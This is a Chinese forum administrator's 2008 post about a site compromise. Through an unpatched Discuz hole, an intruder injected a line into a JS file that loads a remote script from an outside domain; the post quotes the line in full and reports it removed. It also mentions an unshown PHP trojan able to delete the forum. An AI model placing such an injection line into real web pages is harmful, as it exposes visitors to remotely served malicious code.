- 发帖
- 127
- 今日发帖
- 最后登录
- 2015-09-10
|
—
本帖被 eddywong 执行锁定操作(2008-12-22)
—
前几天会员反映论坛首页金山等带有网页过滤防护功能的安全软件提示有恶意脚本,脚本危害不大,经过排查,我发现在某js文件中被恶意的增加了一行document.writeln("<script language=javascript src=http:\/\/www.54ax.cn\/17aq\/q.js><\/script>")代码,删除后基本正常了。我查看了论坛空间的日志,这段代码是11.30日1.41分上传并修改的。我突然想起了11.30日1:44分多了一个会员“1227980741”,而那段时间并未有邀请码的使用。估计是他可能想获得论坛的某个资源,便想着入侵了,而这段时间discuz正好有个漏洞,我没来得及打补丁,估计被他钻了空子。绕过邀请注册,直接注册了。看来他也只是提个醒而已,没有动论坛的其他文件。以后尽量给游客更多权限,资源尽量共享。我看里面有个php木马脚本,是可以删除整个论坛的文件夹的。对给各位会员产生的麻烦表示歉意。尽管我有备份,但还是希望各位会员加强防毒防马意识,及时向论坛反馈。同时提醒会员,下载任何东西最好先查毒,共同维护互联网的安全。 为了保险起见,等有时间重新安装论坛,去除无用的插件,切实保证论坛的安全。
在这里谢谢会员zy700717 的积极反馈,感谢对论坛的关心。 消息来源 http://bbs.ltway.com/thread-28760-1-1.html
|
微博帐号登录